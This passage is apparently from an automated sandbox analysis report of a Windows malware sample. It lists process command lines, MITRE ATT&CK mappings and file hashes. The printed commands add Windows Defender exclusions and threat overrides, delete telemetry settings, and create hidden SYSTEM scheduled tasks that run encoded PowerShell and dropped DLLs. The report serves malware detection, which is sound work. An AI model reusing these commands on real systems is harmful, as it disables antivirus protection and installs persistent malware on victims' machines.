Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3, PID 4584)
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 4, PID 5456)
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5872)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5496)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5532)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5092)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5636)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5816)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 3128)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 392)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5912)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 6056)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5516)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2000)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 1524)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 3328)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 1188)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2852)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4320)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 1564)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5904)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 228)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5824)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5796)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2548)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4592)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4472)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5964)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5732)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 5828)
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\LCifMpYymZWU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\gbPxNkbXHfUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\mVqQIGUXDOgrC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\yvWovCiVU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\WkkDuRgYrrqHXcVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\IzRZTwSZebgYVSAl\" /t REG_DWORD /d 0 /reg:64;"
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\cmd.exe (depth 3, PID 5856)
  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 4, PID 3400)
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5624)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCifMpYymZWU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2272)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 624)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\gbPxNkbXHfUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4368)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2500)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\mVqQIGUXDOgrC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 3924)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5892)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 1344)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5372)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yvWovCiVU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4544)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5660)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\WkkDuRgYrrqHXcVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5520)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 6012)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5780)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5112)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5588)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 1580)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\ElyBxStRAaEXFVuko /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 4272)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 3752)
  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\IzRZTwSZebgYVSAl /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2488)
  schtasks /CREATE /TN "gOoXQPhFC" /SC once /ST 04:34:16 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4196)
  schtasks /run /I /tn "gOoXQPhFC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2656)
  schtasks /DELETE /F /TN "gOoXQPhFC"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4064)
  schtasks /CREATE /TN "mRaseIvrfxDtBOYKW" /SC once /ST 08:24:39 /RU "SYSTEM" /TR "\"C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe\" Ty /Cisite_idYrv 385118 /S" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5168)
  schtasks /run /I /tn "mRaseIvrfxDtBOYKW"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE (depth 1, PID 5320)
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  - Suspicious use of AdjustPrivilegeToken

C:\Windows\system32\gpupdate.exe (depth 2, PID 2096)
  "C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe (depth 1, PID 216)
  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe (depth 1, PID 512)
  gpscript.exe /RefreshSystemParam

C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe (depth 1, PID 5612)
  C:\Windows\Temp\IzRZTwSZebgYVSAl\FQzNUECRlEXpKQi\leAODjb.exe Ty /Cisite_idYrv 385118 /S
  - Checks computer location settings
  - Executes dropped EXE
  - Drops Chrome extension
  - Drops desktop.ini file(s)
  - Drops file in System32 directory
  - Drops file in Program Files directory

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5668)
  schtasks /DELETE /F /TN "bdnnguwcOLBYKAjbbA"

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 1484)
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 2428)
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 5812)
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5328)
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5736)
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\yvWovCiVU\amDviS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "eGwAoTnpAObQfPU" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5396)
  schtasks /CREATE /TN "eGwAoTnpAObQfPU2" /F /xml "C:\Program Files (x86)\yvWovCiVU\JZfiWJf.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 3588)
  schtasks /END /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 1776)
  schtasks /DELETE /F /TN "eGwAoTnpAObQfPU"

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 2492)
  schtasks /CREATE /TN "ALvbXdfFiQJKEp" /F /xml "C:\Program Files (x86)\LCifMpYymZWU2\eYZkXIj.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5532)
  schtasks /CREATE /TN "BIiSjOILpRnDn2" /F /xml "C:\ProgramData\WkkDuRgYrrqHXcVB\jsGyjxb.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 1028)
  schtasks /CREATE /TN "uCAhUOuaRBfXDMltv2" /F /xml "C:\Program Files (x86)\yucluTmaHGGxjmhxbXR\AZEYcNv.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 5548)
  schtasks /CREATE /TN "cLzKLCJHWfKFSkdKasF2" /F /xml "C:\Program Files (x86)\mVqQIGUXDOgrC\AoTCTed.xml" /RU "SYSTEM"
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 1876)
  schtasks /CREATE /TN "FTXCzbcEvROqagNdd" /SC once /ST 05:12:17 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll\",#1 /acsite_idhae 385118" /V1 /F
  - Drops file in Windows directory
  - Creates scheduled task(s)

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4320)
  schtasks /run /I /tn "FTXCzbcEvROqagNdd"

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 5968)
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5628)
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe (depth 2, PID 5276)
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe (depth 3, PID 5664)
  REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe (depth 2, PID 4764)
  schtasks /DELETE /F /TN "mRaseIvrfxDtBOYKW"

C:\Windows\system32\rundll32.EXE (depth 1, PID 5332)
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118

C:\Windows\SysWOW64\rundll32.exe (depth 2, PID 5972)
  C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\IzRZTwSZebgYVSAl\rGBfzonX\YTmebuT.dll",#1 /acsite_idhae 385118
  - Blocklisted process makes network request
  - Checks BIOS information in registry
  - Loads dropped DLL
  - Enumerates system info in registry

C:\Windows\SysWOW64\schtasks.exe (depth 3, PID 2528)
  schtasks /DELETE /F /TN "FTXCzbcEvROqagNdd"
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1)
  - Registry Run Keys / Startup Folder (1)
- Create or Modify System Process (2)
  - Windows Service (2)
- Scheduled Task/Job (1)
Defense Evasion
- Impair Defenses (1)
  - Disable or Modify System Firewall (1)
- Modify Registry (3)
- Subvert Trust Controls (1)
  - Install Root Certificate (1)
- Virtualization/Sandbox Evasion (1)
Downloads
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json (187B)
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json (136B)
- C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json (150B)
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json (151B)
- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\additional_file0.tmp (2.5MB)
- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\assistant_installer.exe (1.9MB)
- C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbgcore.DLL
Filesize166KB
MD58b6f64e5d3a608b434079e50a1277913
SHA103f431fabf1c99a48b449099455c1575893d9f32
SHA256926d444ffca166e006920412677c4ed2ef159cf0efc0578cb45b824f428f5eb2
SHA512c9aeac62ece564ac64a894300fb9d41d13f22951ead73421854c23c506760d984dff0af92bef2d80f3a66e782f0075832e9c24a50ae6110d27a25c14e065b41c
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\assistant\dbghelp.dll
Filesize1.7MB
MD5925ea07f594d3fce3f73ede370d92ef7
SHA1f67ea921368c288a9d3728158c3f80213d89d7c2
SHA2566d02ebd4ec9a6093f21cd8ccefb9445fa0ab7b1f69ac868a5cfc5d28ed8d2de9
SHA512a809851da820d9fdd8fb860a8f549311dcc2579df2c6f6fba74f50d5d8bf94baa834b09fb5476ac248f18d1deb6b47d4fdd6d658889d5d45ca8774a9264483d2
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403281421291\opera_package
Filesize109.0MB
MD5856c0e24f5ee9715ee77bd4fef0995ae
SHA102b109c418bfdee0fc725faa35f8c45ae0725929
SHA25674e4528ae1db501f4f5f714aead1a052b8d20cf30167ca6218f5718601e85ff1
SHA512242d571acb0b2c35a7272a3e739ab707242cbe17109dc14bc86de38a238238539f867842ea242ba4122f657e033abe4210c107582bbf49ab47f0e9c267e6f6ff
-
Filesize
6.4MB
MD519024664b4bd6c49e4d898317b4a2a33
SHA1f6d8c538ab5444df258ffd2d958bd4db65997bd9
SHA25611b47b3d9cf14562aabfaa2e4e9e67ebbb00fb3e31f9f44f148d03cd3fc3da37
